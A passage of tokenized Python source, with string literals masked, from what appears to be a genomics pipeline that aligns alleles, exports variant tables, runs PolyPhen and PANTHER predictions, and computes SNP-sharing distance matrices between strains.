run ( ) <EOL> @ follows ( mkdir ( os . path . join ( PARAMS [ "<STR_LIT>" ] , "<STR_LIT>" ) ) ) <EOL> @ merge ( buildAlleles , "<STR_LIT>" ) <EOL> def setupMultipleAlignment ( infiles , outfile ) : <EOL> '''<STR_LIT>''' <EOL> targetdir = os . path . join ( PARAMS [ "<STR_LIT>" ] , "<STR_LIT>" ) <EOL> filepool_gtf = IOTools . FilePoolMemory ( "<STR_LIT>" % locals ( ) ) <EOL> filepool_pep = IOTools . FilePoolMemory ( "<STR_LIT>" % locals ( ) ) <EOL> filepool_cds = IOTools . FilePoolMemory ( "<STR_LIT>" % locals ( ) ) <EOL> outf = open ( outfile , "<STR_LIT:w>" ) <EOL> outf . write ( "<STR_LIT>" ) <EOL> map_gene2group = { } <EOL> map_seqid2code = { } <EOL> x = <NUM_LIT:0> <EOL> counts = E . Counter ( ) <EOL> for infile in infiles : <EOL> track = infile [ : - len ( "<STR_LIT>" ) ] <EOL> E . info ( "<STR_LIT>" % track ) <EOL> reader = CSV . DictReader ( open ( infile + "<STR_LIT>" , "<STR_LIT>" ) , dialect = "<STR_LIT>" ) <EOL> for row in reader : <EOL> counts . input += <NUM_LIT:1> <EOL> gene_id , allele_id , transcript_id = row [ "<STR_LIT>" ] , row [ "<STR_LIT>" ] , row [ "<STR_LIT>" ] <EOL> if gene_id not in map_gene2group : <EOL> map_gene2group [ gene_id ] = len ( map_gene2group ) <EOL> group_id = map_gene2group [ gene_id ] <EOL> new_gene_id = "<STR_LIT:->" . join ( ( gene_id , allele_id ) ) <EOL> if row [ "<STR_LIT>" ] == "<STR_LIT:1>" : code = "<STR_LIT>" <EOL> if row [ "<STR_LIT>" ] == "<STR_LIT:1>" : <EOL> counts . nmd_knockouts += <NUM_LIT:1> <EOL> continue <EOL> else : code = "<STR_LIT>" <EOL> seq_id = SEPARATOR . join ( ( track , transcript_id , new_gene_id ) ) <EOL> map_seqid2code [ seq_id ] = code <EOL> seq_id = SEPARATOR . join ( ( seq_id , code ) ) <EOL> outf . write ( "<STR_LIT>" % ( seq_id , group_id ) ) <EOL> filepool_pep . write ( str ( group_id ) , "<STR_LIT>" % ( seq_id , row [ "<STR_LIT>" ] ) ) <EOL> filepool_cds . write ( str ( group_id ) , "<STR_LIT>" % ( seq_id , row [ "<STR_LIT>" ] ) ) <EOL> counts . 
written += <NUM_LIT:1> <EOL> with open ( infile + "<STR_LIT>" ) as inf : <EOL> for gtf in GTF . iterator ( inf ) : <EOL> group_id = map_gene2group [ gtf . gene_id ] <EOL> new_gene_id = "<STR_LIT:->" . join ( ( gtf . gene_id , gtf [ "<STR_LIT>" ] ) ) <EOL> seq_id = SEPARATOR . join ( ( track , gtf . transcript_id , new_gene_id ) ) <EOL> seq_id = SEPARATOR . join ( ( seq_id , map_seqid2code [ seq_id ] ) ) <EOL> gtf . transcript_id = seq_id <EOL> filepool_gtf . write ( group_id , str ( gtf ) + "<STR_LIT:\n>" ) <EOL> x += <NUM_LIT:1> <EOL> E . info ( "<STR_LIT>" ) <EOL> filepool_gtf . close ( ) <EOL> filepool_pep . close ( ) <EOL> filepool_cds . close ( ) <EOL> outf . close ( ) <EOL> counts . ngroups = len ( map_gene2group ) <EOL> counts . nsequences = len ( map_seqid2code ) <EOL> E . info ( "<STR_LIT>" % ( str ( counts ) ) ) <EOL> @ transform ( os . path . join ( PARAMS [ "<STR_LIT>" ] , "<STR_LIT>" , "<STR_LIT:*>" , "<STR_LIT>" ) , <EOL> suffix ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" ) <EOL> def buildMultipleAlignments ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> track = infile [ : - len ( "<STR_LIT>" ) ] <EOL> filename_cds = track + "<STR_LIT>" <EOL> filename_pep = track + "<STR_LIT>" <EOL> to_cluster = True <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> @ merge ( buildMultipleAlignments , "<STR_LIT>" ) <EOL> def buildMultipleAlignmentVariantColumns ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> track = infile [ : - len ( "<STR_LIT>" ) ] <EOL> filename_cds = track + "<STR_LIT>" <EOL> filename_pep = track + "<STR_LIT>" <EOL> to_cluster = True <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> @ merge ( buildMultipleAlignments , "<STR_LIT>" ) <EOL> def mergeMultipleAlignments ( infiles , outfile ) : <EOL> '''<STR_LIT>''' <EOL> for section in ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) : <EOL> outfilename = outfile + "<STR_LIT:.>" + section + "<STR_LIT>" <EOL> counter = E . Counter ( ) <EOL> E . 
info ( "<STR_LIT>" % ( section , outfilename ) ) <EOL> outf = gzip . open ( outfilename , "<STR_LIT:w>" ) <EOL> outf . write ( "<STR_LIT>" ) <EOL> for infile in infiles : <EOL> counter . input += <NUM_LIT:1> <EOL> dirname , filename = os . path . split ( infile ) <EOL> cluster_id = re . match ( "<STR_LIT>" , filename ) . groups ( ) [ <NUM_LIT:0> ] <EOL> infilename = os . path . join ( dirname , "<STR_LIT>" % ( cluster_id , section ) ) <EOL> if not os . path . exists ( infilename ) : <EOL> counter . missing += <NUM_LIT:1> <EOL> E . warn ( "<STR_LIT>" % infilename ) <EOL> continue <EOL> for entry in FastaIterator . FastaIterator ( open ( infilename , "<STR_LIT:r>" ) ) : <EOL> parts = entry . title . split ( SEPARATOR ) <EOL> if len ( parts ) == <NUM_LIT:4> : <EOL> species , transcript_id , gene_id , code = entry . title . split ( SEPARATOR ) <EOL> elif len ( parts ) == <NUM_LIT:2> : <EOL> species , gene_id = entry . title . split ( SEPARATOR ) <EOL> transcipt_id = gene_id <EOL> code = "<STR_LIT>" <EOL> gene_id , allele_id = gene_id . split ( "<STR_LIT:->" ) <EOL> transcript_id += "<STR_LIT:->" + allele_id <EOL> outf . write ( "<STR_LIT:\t>" . join ( map ( str , <EOL> ( cluster_id , <EOL> species , <EOL> transcript_id , <EOL> gene_id , <EOL> code , <EOL> entry . sequence ) ) ) + "<STR_LIT:\n>" ) <EOL> counter . output += <NUM_LIT:1> <EOL> outf . close ( ) <EOL> E . info ( "<STR_LIT>" % ( outfilename , str ( counter ) ) ) <EOL> P . touch ( outfile ) <EOL> @ merge ( '<STR_LIT>' , <EOL> "<STR_LIT>" ) <EOL> def buildMAF ( infiles , outfile ) : <EOL> tracks = "<STR_LIT:U+0020>" . join ( [ "<STR_LIT>" % x [ : - len ( "<STR_LIT>" ) ] for x in infiles ] ) <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> @ files ( ( ( PARAMS [ "<STR_LIT>" ] , "<STR_LIT>" ) , ) ) <EOL> def exportVariantTable ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> outf = IOTools . openFile ( outfile , "<STR_LIT:w>" ) <EOL> inf = gzip . 
open ( infile , "<STR_LIT:r>" ) <EOL> headers = [ ] <EOL> ninput = <NUM_LIT:0> <EOL> counts = E . Counter ( ) <EOL> for line in inf : <EOL> data = line [ : - <NUM_LIT:1> ] . split ( "<STR_LIT:\t>" ) <EOL> if line . startswith ( "<STR_LIT>" ) : <EOL> if not headers : headers = data [ <NUM_LIT:9> : ] <EOL> outf . write ( "<STR_LIT>" % "<STR_LIT:\t>" . join ( headers ) ) <EOL> continue <EOL> elif line . startswith ( "<STR_LIT:#>" ) : <EOL> continue <EOL> contig , pos , ref = data [ <NUM_LIT:0> ] , data [ <NUM_LIT:1> ] , data [ <NUM_LIT:3> ] <EOL> pos = int ( pos ) <EOL> counts . input += <NUM_LIT:1> <EOL> contig = "<STR_LIT>" % contig <EOL> output_genotypes = [ ] <EOL> for h , genotype_info in zip ( headers , data [ <NUM_LIT:9> : ] ) : <EOL> if genotype_info == "<STR_LIT:.>" or genotype_info . startswith ( "<STR_LIT>" ) : <EOL> output_genotype = "<STR_LIT:1>" <EOL> else : <EOL> consensus_quality , genotype_quality , read_depth = "<STR_LIT:0>" , "<STR_LIT:0>" , "<STR_LIT:0>" <EOL> dd = genotype_info . split ( "<STR_LIT::>" ) <EOL> if len ( dd ) == <NUM_LIT:5> : <EOL> genotype , mapping_quality , hcg , genotype_quality , read_depth = dd <EOL> if hcg != "<STR_LIT:1>" : output_genotype = "<STR_LIT:?>" <EOL> elif len ( dd ) == <NUM_LIT:4> : <EOL> genotype , mapping_quality , genotype_quality , read_depth = dd <EOL> elif len ( dd ) == <NUM_LIT:2> : <EOL> genotype , genotype_quality = dd <EOL> elif len ( dd ) == <NUM_LIT:1> : <EOL> genotype = dd [ <NUM_LIT:0> ] <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" % ( genotype_info , line ) ) <EOL> genotype = genotype . split ( "<STR_LIT:/>" ) <EOL> if len ( set ( genotype ) ) != <NUM_LIT:1> : <EOL> output_genotype = "<STR_LIT:h>" <EOL> else : <EOL> genotype = list ( genotype ) [ <NUM_LIT:0> ] <EOL> output_genotype = int ( genotype ) + <NUM_LIT:1> <EOL> output_genotypes . append ( output_genotype ) <EOL> counts . output += <NUM_LIT:1> <EOL> outf . write ( "<STR_LIT>" % ( contig , pos , "<STR_LIT:\t>" . 
join ( map ( str , output_genotypes ) ) ) ) <EOL> outf . close ( ) <EOL> E . info ( "<STR_LIT:%s>" % str ( counts ) ) <EOL> @ files ( ( ( PARAMS [ "<STR_LIT>" ] , "<STR_LIT>" ) , ) ) <EOL> def exportFunctionalVariantTable ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> headers = [ ] <EOL> ninput = <NUM_LIT:0> <EOL> counts = E . Counter ( ) <EOL> dbhandle = sqlite3 . connect ( PARAMS [ "<STR_LIT>" ] ) <EOL> cc = dbhandle . cursor ( ) <EOL> tracks = [ x [ <NUM_LIT:0> ] for x in cc . execute ( "<STR_LIT>" ) . fetchall ( ) ] <EOL> map_track2column = dict ( [ ( x [ <NUM_LIT:1> ] , x [ <NUM_LIT:0> ] ) for x in enumerate ( tracks ) ] ) <EOL> statement = '''<STR_LIT>''' <EOL> ncolumns = len ( tracks ) <EOL> outf = IOTools . openFile ( outfile , "<STR_LIT:w>" ) <EOL> outf . write ( "<STR_LIT>" % "<STR_LIT:\t>" . join ( tracks ) ) <EOL> for locus_id , data in itertools . groupby ( cc . execute ( statement ) , key = lambda x : x [ <NUM_LIT:0> ] ) : <EOL> row = [ "<STR_LIT:w>" ] * ncolumns <EOL> for x , track , contig , pos , prediction in data : <EOL> if prediction in '<STR_LIT>' or '<STR_LIT>' : <EOL> row [ map_track2column [ track ] ] = "<STR_LIT:d>" <EOL> elif prediction_id == "<STR_LIT>" : <EOL> row [ map_track2column [ track ] ] = "<STR_LIT:u>" <EOL> elif prediction_id == "<STR_LIT>" : <EOL> row [ map_track2column [ track ] ] = "<STR_LIT:b>" <EOL> outf . write ( "<STR_LIT:\t>" . join ( ( contig , str ( pos + <NUM_LIT:1> ) , "<STR_LIT:\t>" . join ( row ) ) ) + "<STR_LIT:\n>" ) <EOL> outf . close ( ) <EOL> E . info ( "<STR_LIT:%s>" % str ( counts ) ) <EOL> @ merge ( summarizeAllelesPerGene , <EOL> ( "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ) ) <EOL> def exportKnockoutLists ( infiles , outfiles ) : <EOL> dbhandle = sqlite3 . connect ( PARAMS [ "<STR_LIT>" ] ) <EOL> outf = gzip . 
open ( outfiles [ <NUM_LIT:0> ] , "<STR_LIT:w>" ) <EOL> headers = ( "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ) <EOL> outf . write ( "<STR_LIT>" % "<STR_LIT:\t>" . join ( headers ) ) <EOL> for infile in infiles : <EOL> track = infile [ : - len ( "<STR_LIT>" ) ] <EOL> strain = track [ : - len ( "<STR_LIT>" ) ] <EOL> statement = '''<STR_LIT>''' % locals ( ) <EOL> outf . write ( "<STR_LIT:\n>" . join ( [ "<STR_LIT:\t>" . join ( map ( str , x ) ) for x in Database . executewait ( dbhandle , statement ) . fetchall ( ) ] ) + "<STR_LIT:\n>" ) <EOL> outf . close ( ) <EOL> headers = ( "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ) <EOL> outf = gzip . open ( outfiles [ <NUM_LIT:1> ] , "<STR_LIT:w>" ) <EOL> outf . write ( "<STR_LIT>" % "<STR_LIT:\t>" . join ( headers ) ) <EOL> columns = [ "<STR_LIT>" % t for t in TRACKS ] <EOL> fields = "<STR_LIT:U+002C>" . join ( columns ) <EOL> statement = '''<STR_LIT>''' % locals ( ) <EOL> data = list ( dbhandle . execute ( statement ) ) <EOL> d = dict ( zip ( [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] + columns , zip ( * data ) ) ) <EOL> c = [ ] <EOL> for x in range ( len ( d [ "<STR_LIT>" ] ) ) : <EOL> s = [ ] <EOL> for t in TRACKS : <EOL> if d [ "<STR_LIT>" % t ] [ x ] != <NUM_LIT:0> : s . append ( t ) <EOL> c . append ( "<STR_LIT:U+002C>" . join ( s ) ) <EOL> for t in TRACKS : del d [ "<STR_LIT>" % t ] <EOL> for d , strains in zip ( data , c ) : <EOL> outf . write ( "<STR_LIT:\t>" . join ( map ( str , d [ : <NUM_LIT:3> ] ) ) + "<STR_LIT>" % strains ) <EOL> outf . close ( ) <EOL> @ merge ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> def buildPolyphenInput ( infiles , outfile ) : <EOL> '''<STR_LIT>''' <EOL> statement = '''<STR_LIT>''' <EOL> dbhandle = sqlite3 . connect ( PARAMS [ "<STR_LIT>" ] ) <EOL> cc = dbhandle . cursor ( ) <EOL> infiles . sort ( ) <EOL> map_transcript2id = dict ( <EOL> cc . 
execute ( "<STR_LIT>" ) . fetchall ( ) ) <EOL> total_counts = E . Counter ( ) <EOL> notfound , found = set ( ) , set ( ) <EOL> outf_map = open ( outfile + "<STR_LIT>" , "<STR_LIT:w>" ) <EOL> outf_map . write ( "<STR_LIT>" ) <EOL> outf = open ( outfile , "<STR_LIT:w>" ) <EOL> snps = { } <EOL> locus_ids = { } <EOL> for infile in infiles : <EOL> table = P . toTable ( infile ) <EOL> track = table [ : - len ( "<STR_LIT>" ) ] <EOL> cc . execute ( statement % locals ( ) ) <EOL> counts = E . Counter ( ) <EOL> snp_id = <NUM_LIT:0> <EOL> for transcript_id , cds_start , cds_end , orig_codons , variant_codons , orig_na , variant_na , contig , pos in cc : <EOL> counts . input += <NUM_LIT:1> <EOL> if transcript_id not in map_transcript2id : <EOL> notfound . add ( transcript_id ) <EOL> counts . not_found += <NUM_LIT:1> <EOL> continue <EOL> if "<STR_LIT:U+002C>" in variant_codons : <EOL> counts . heterozygous += <NUM_LIT:1> <EOL> continue <EOL> for phase in range ( <NUM_LIT:0> , <NUM_LIT:3> ) : <EOL> if orig_na [ phase ] . lower ( ) != variant_na [ phase ] . lower ( ) : <EOL> break <EOL> pid = map_transcript2id [ transcript_id ] <EOL> peptide_pos = int ( math . floor ( cds_start / <NUM_LIT> ) ) + <NUM_LIT:1> <EOL> key = "<STR_LIT>" % ( pid , peptide_pos , variant_codons ) <EOL> if key in snps : <EOL> snp_id = snps [ key ] <EOL> else : <EOL> snp_id = len ( snps ) <EOL> snps [ key ] = snp_id <EOL> outf . write ( "<STR_LIT>" % ( snp_id , <EOL> pid , <EOL> peptide_pos , <EOL> orig_codons , <EOL> variant_codons , <EOL> ) ) <EOL> counts . output += <NUM_LIT:1> <EOL> locus_key = "<STR_LIT>" % ( contig , pos , variant_codons ) <EOL> if locus_key not in locus_ids : <EOL> locus_ids [ locus_key ] = len ( locus_ids ) <EOL> outf_map . write ( "<STR_LIT>" % ( snp_id , <EOL> track , <EOL> transcript_id , <EOL> pid , <EOL> peptide_pos - <NUM_LIT:1> , <EOL> locus_ids [ locus_key ] , <EOL> contig , <EOL> pos , <EOL> phase ) ) <EOL> found . 
add ( transcript_id ) <EOL> total_counts += counts <EOL> E . info ( "<STR_LIT>" % ( table , str ( counts ) ) ) <EOL> outf . close ( ) <EOL> outf_map . close ( ) <EOL> E . info ( "<STR_LIT>" % ( table , <EOL> len ( found ) , <EOL> len ( notfound ) ) ) <EOL> E . info ( "<STR_LIT>" % ( str ( total_counts ) , len ( snps ) , len ( locus_ids ) ) ) <EOL> if notfound : <EOL> E . warn ( "<STR_LIT>" % len ( notfound ) ) <EOL> E . warn ( "<STR_LIT>" % "<STR_LIT:U+002C>" . join ( notfound ) ) <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> @ transform ( buildPolyphenInput , suffix ( "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> def buildPolyphenFeatures ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> nsnps = len ( [ x for x in open ( infile ) ] ) <EOL> to_cluster = True <EOL> stepsize = max ( int ( nsnps / <NUM_LIT> ) , <NUM_LIT:1000> ) <EOL> job_array = ( <NUM_LIT:0> , nsnps , stepsize ) <EOL> E . info ( "<STR_LIT>" % nsnps ) <EOL> scratchdir = os . path . join ( os . path . abspath ( "<STR_LIT:.>" ) , "<STR_LIT>" ) <EOL> try : <EOL> os . mkdir ( scratchdir ) <EOL> except OSError : <EOL> pass <EOL> resultsdir = outfile + "<STR_LIT>" <EOL> try : <EOL> os . mkdir ( resultsdir ) <EOL> except OSError : <EOL> pass <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> to_cluster = False <EOL> job_array = None <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> @ files ( [ ( buildPolyphenFeatures , "<STR_LIT>" % x , x ) for x in P . asList ( PARAMS [ "<STR_LIT>" ] ) ] ) <EOL> def runPolyphen ( infile , outfile , model ) : <EOL> '''<STR_LIT>''' <EOL> to_cluster = True <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> @ transform ( buildPolyphenInput , suffix ( "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> def loadPolyphenMap ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> table = P . toTable ( outfile ) <EOL> statement = '''<STR_LIT>''' <EOL> P . 
run ( ) <EOL> @ transform ( runPolyphen , suffix ( "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> def loadPolyphen ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> table = P . toTable ( outfile ) <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> @ transform ( loadPolyphen , suffix ( "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> def analysePolyphen ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> table = P . toTable ( infile ) <EOL> tablename_map = "<STR_LIT>" <EOL> dbhandle = sqlite3 . connect ( PARAMS [ "<STR_LIT>" ] ) <EOL> cc = dbhandle . cursor ( ) <EOL> statement = '''<STR_LIT>''' % locals ( ) <EOL> data = cc . execute ( statement ) . fetchall ( ) <EOL> statement = '''<STR_LIT>''' <EOL> gene_ids = cc . execute ( statement ) . fetchall ( ) <EOL> total_nsnps = sum ( [ x [ <NUM_LIT:1> ] for x in data ] ) <EOL> total_ndel = sum ( [ x [ <NUM_LIT:2> ] for x in data ] ) <EOL> total_length = sum ( [ x [ <NUM_LIT:1> ] for x in gene_ids ] ) <EOL> del_p = float ( total_ndel ) / total_nsnps <EOL> len_p = float ( total_nsnps ) / total_length <EOL> com_p = float ( total_ndel ) / total_length <EOL> E . info ( "<STR_LIT>" % ( total_ndel , total_nsnps , del_p ) ) <EOL> E . info ( "<STR_LIT>" % ( total_nsnps , total_length , len_p ) ) <EOL> E . info ( "<STR_LIT>" % ( total_ndel , total_length , com_p ) ) <EOL> outf = open ( outfile , "<STR_LIT:w>" ) <EOL> outf . write ( "<STR_LIT:\t>" . join ( ( "<STR_LIT>" , "<STR_LIT:code>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , ) ) + "<STR_LIT:\n>" ) <EOL> del_pvalues , len_pvalues , com_pvalues = [ ] , [ ] , [ ] <EOL> for gene_id , nsnps , ndel , length in data : <EOL> del_pvalues . append ( scipy . stats . binom . sf ( ndel - <NUM_LIT:1> , nsnps , del_p ) ) <EOL> len_pvalues . append ( scipy . stats . binom . sf ( nsnps - <NUM_LIT:1> , int ( round ( length ) ) , len_p ) ) <EOL> com_pvalues . 
append ( scipy . stats . binom . sf ( ndel - <NUM_LIT:1> , int ( round ( length ) ) , com_p ) ) <EOL> del_q = Stats . doFDR ( del_pvalues ) <EOL> len_q = Stats . doFDR ( len_pvalues ) <EOL> com_q = Stats . doFDR ( com_pvalues ) <EOL> fdr = PARAMS [ "<STR_LIT>" ] <EOL> found = set ( ) <EOL> for a , del_pvalue , del_qvalue , len_pvalue , len_qvalue , com_pvalue , com_qvalue in zip ( data , <EOL> del_pvalues , del_q . mQValues , <EOL> len_pvalues , len_q . mQValues , <EOL> com_pvalues , com_q . mQValues , <EOL> ) : <EOL> gene_id , nsnps , ndel , length = a <EOL> found . add ( gene_id ) <EOL> del_p = float ( ndel ) / nsnps <EOL> len_p = float ( nsnps ) / length <EOL> code = "<STR_LIT>" . join ( [ str ( int ( x < fdr ) ) for x in ( del_qvalue , len_qvalue , com_qvalue ) ] ) <EOL> outf . write ( "<STR_LIT:\t>" . join ( ( gene_id , <EOL> code , <EOL> "<STR_LIT>" % int ( round ( length ) ) , <EOL> "<STR_LIT>" % int ( nsnps ) , <EOL> "<STR_LIT>" % int ( ndel ) , <EOL> "<STR_LIT>" % del_p , <EOL> "<STR_LIT>" % del_pvalue , <EOL> "<STR_LIT>" % del_qvalue , <EOL> "<STR_LIT>" % len_p , <EOL> "<STR_LIT>" % len_pvalue , <EOL> "<STR_LIT>" % len_qvalue , <EOL> "<STR_LIT>" % com_p , <EOL> "<STR_LIT>" % com_pvalue , <EOL> "<STR_LIT>" % com_qvalue , <EOL> ) ) + "<STR_LIT:\n>" ) <EOL> code = "<STR_LIT>" <EOL> for gene_id , length in gene_ids : <EOL> if gene_id in found : continue <EOL> outf . write ( "<STR_LIT:\t>" . join ( ( gene_id , <EOL> code , <EOL> "<STR_LIT>" % int ( round ( length ) ) , <EOL> "<STR_LIT>" % <NUM_LIT:0> , <EOL> "<STR_LIT>" % <NUM_LIT:0> , <EOL> "<STR_LIT>" % <NUM_LIT:0> , <EOL> "<STR_LIT>" % <NUM_LIT:1> , <EOL> "<STR_LIT>" % <NUM_LIT:1> , <EOL> "<STR_LIT>" % <NUM_LIT:0> , <EOL> "<STR_LIT>" % <NUM_LIT:1> , <EOL> "<STR_LIT>" % <NUM_LIT:1> , <EOL> "<STR_LIT>" % <NUM_LIT:0> , <EOL> "<STR_LIT>" % <NUM_LIT:1> , <EOL> "<STR_LIT>" % <NUM_LIT:1> , <EOL> ) ) + "<STR_LIT:\n>" ) <EOL> outf . 
close ( ) <EOL> @ transform ( analysePolyphen , suffix ( "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> def loadPolyphenAnalysis ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> table = P . toTable ( outfile ) <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> @ files ( ( ( buildPeptideFasta , "<STR_LIT>" ) , ) ) <EOL> def preparePanther ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> to_cluster = True <EOL> if type ( infile ) in ( types . ListType , types . TupleType ) : <EOL> infile = infile [ <NUM_LIT:0> ] <EOL> tmpdir = P . getTempDir ( "<STR_LIT:.>" ) <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> shutil . rmtree ( tmpdir ) <EOL> @ files ( ( ( ( buildPolyphenInput , preparePanther ) , "<STR_LIT>" ) , ) ) <EOL> def runPanther ( infiles , outfile ) : <EOL> '''<STR_LIT>''' <EOL> filename_snps , filename_scores = infiles <EOL> tmpdir = P . getTempDir ( "<STR_LIT:.>" ) <EOL> peptides = PARAMS [ "<STR_LIT>" ] <EOL> tmpfilename_snps = P . getTempFilename ( "<STR_LIT:.>" ) <EOL> statement = '''<STR_LIT>''' <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> shutil . rmtree ( tmpdir ) <EOL> os . unlink ( tmpfilename_snps ) <EOL> @ transform ( runPanther , suffix ( "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> def loadPanther ( infile , outfile ) : <EOL> '''<STR_LIT>''' <EOL> table = P . toTable ( outfile ) <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> @ split ( loadPolyphenMap , ( "<STR_LIT>" <EOL> , "<STR_LIT>" <EOL> , "<STR_LIT>" <EOL> , "<STR_LIT>" <EOL> , "<STR_LIT>" <EOL> ) ) <EOL> def buildSharedSNPMatrix ( infiles , outfiles ) : <EOL> '''<STR_LIT>''' <EOL> dbhandle = sqlite3 . connect ( PARAMS [ "<STR_LIT>" ] ) <EOL> cc = dbhandle . cursor ( ) <EOL> segregating_sites = cc . execute ( '<STR_LIT>' ) . fetchone ( ) [ <NUM_LIT:0> ] <EOL> statement = '''<STR_LIT>''' <EOL> cc . execute ( statement ) <EOL> matrix = collections . defaultdict ( int ) <EOL> for k , vals in itertools . 
groupby ( cc , key = lambda x : x [ <NUM_LIT:0> ] ) : <EOL> tracks = [ x [ <NUM_LIT:1> ] for x in list ( vals ) ] <EOL> for t1 in tracks : <EOL> matrix [ ( t1 , t1 ) ] += <NUM_LIT:1> <EOL> if len ( tracks ) > <NUM_LIT:1> : <EOL> for t1 , t2 in itertools . combinations ( tracks , <NUM_LIT:2> ) : <EOL> matrix [ ( t1 , t2 ) ] += <NUM_LIT:1> <EOL> matrix [ ( t2 , t1 ) ] += <NUM_LIT:1> <EOL> all_tracks = set ( [ x [ <NUM_LIT:0> ] for x in matrix . keys ( ) ] + [ x [ <NUM_LIT:1> ] for x in matrix . keys ( ) ] ) <EOL> outf = open ( outfiles [ <NUM_LIT:0> ] , "<STR_LIT:w>" ) <EOL> outf . write ( "<STR_LIT>" % "<STR_LIT:\t>" . join ( all_tracks ) ) <EOL> for track1 in all_tracks : <EOL> outf . write ( "<STR_LIT:%s>" % track1 ) <EOL> for track2 in all_tracks : <EOL> outf . write ( "<STR_LIT>" % matrix [ ( track1 , track2 ) ] ) <EOL> outf . write ( "<STR_LIT:\n>" ) <EOL> outf . close ( ) <EOL> outf = open ( outfiles [ <NUM_LIT:1> ] , "<STR_LIT:w>" ) <EOL> outf . write ( "<STR_LIT>" % "<STR_LIT:\t>" . join ( all_tracks ) ) <EOL> for track1 in all_tracks : <EOL> outf . write ( "<STR_LIT:%s>" % track1 ) <EOL> for track2 in all_tracks : <EOL> if track1 == track2 : <EOL> outf . write ( "<STR_LIT>" % <NUM_LIT:0> ) <EOL> else : <EOL> outf . write ( "<STR_LIT>" % ( segregating_sites - matrix [ ( track1 , track2 ) ] ) ) <EOL> outf . write ( "<STR_LIT:\n>" ) <EOL> outf . close ( ) <EOL> outf = open ( outfiles [ <NUM_LIT:2> ] , "<STR_LIT:w>" ) <EOL> outf . write ( "<STR_LIT>" % "<STR_LIT:\t>" . join ( all_tracks ) ) <EOL> pids = { } <EOL> for track1 in all_tracks : <EOL> outf . write ( "<STR_LIT:%s>" % track1 ) <EOL> for track2 in all_tracks : <EOL> a = segregating_sites - ( matrix [ ( track1 , track1 ) ] + matrix [ ( track2 , track2 ) ] - <NUM_LIT:2> * matrix [ ( track1 , track2 ) ] ) <EOL> pid = <NUM_LIT> * a / segregating_sites <EOL> outf . write ( "<STR_LIT>" % pid ) <EOL> pids [ ( track1 , track2 ) ] = pid <EOL> outf . write ( "<STR_LIT:\n>" ) <EOL> outf . 
close ( ) <EOL> outf = open ( outfiles [ <NUM_LIT:3> ] , "<STR_LIT:w>" ) <EOL> outf . write ( "<STR_LIT>" % "<STR_LIT:\t>" . join ( all_tracks ) ) <EOL> for track1 in all_tracks : <EOL> outf . write ( "<STR_LIT:%s>" % track1 ) <EOL> for track2 in all_tracks : <EOL> val = <NUM_LIT> - pids [ ( track1 , track2 ) ] <EOL> outf . write ( "<STR_LIT>" % val ) <EOL> outf . write ( "<STR_LIT:\n>" ) <EOL> outf . close ( ) <EOL> outfile_distance , outfile_tree = outfiles [ <NUM_LIT:3> ] , outfiles [ <NUM_LIT:4> ] <EOL> statement = '''<STR_LIT>''' <EOL> P . run ( ) <EOL> @ files ( ( ( None , "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( None , "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ) ) <EOL> def buildQTLWorkspaces ( infile , outfile , workspace ) : <EOL> PEnrichment . buildWorkSpace ( outfile , workspace ) <EOL> @ files ( ( ( "<STR_LIT>" % PARAMS [ "<STR_LIT>" ] , "<STR_LIT>" ) , ) ) <EOL> def buildEnrichmentIsochores ( infile , outfile ) : <EOL> PEnrichment . buildIsochoresGC ( infile , outfile ) <EOL> @ follows ( mkdir ( "<STR_LIT>" ) , loadPolyphen , loadPolyphenMap ) <EOL> @ transform ( "<STR_LIT>" , <EOL> regex ( "<STR_LIT>" ) , <EOL> r"<STR_LIT>" ) <EOL> def buildDeleteriousSNPs ( infile , outfile ) : <EOL> track = infile [ : - len ( "<STR_LIT>" ) ] <EOL> outf = gzip . open ( outfile , 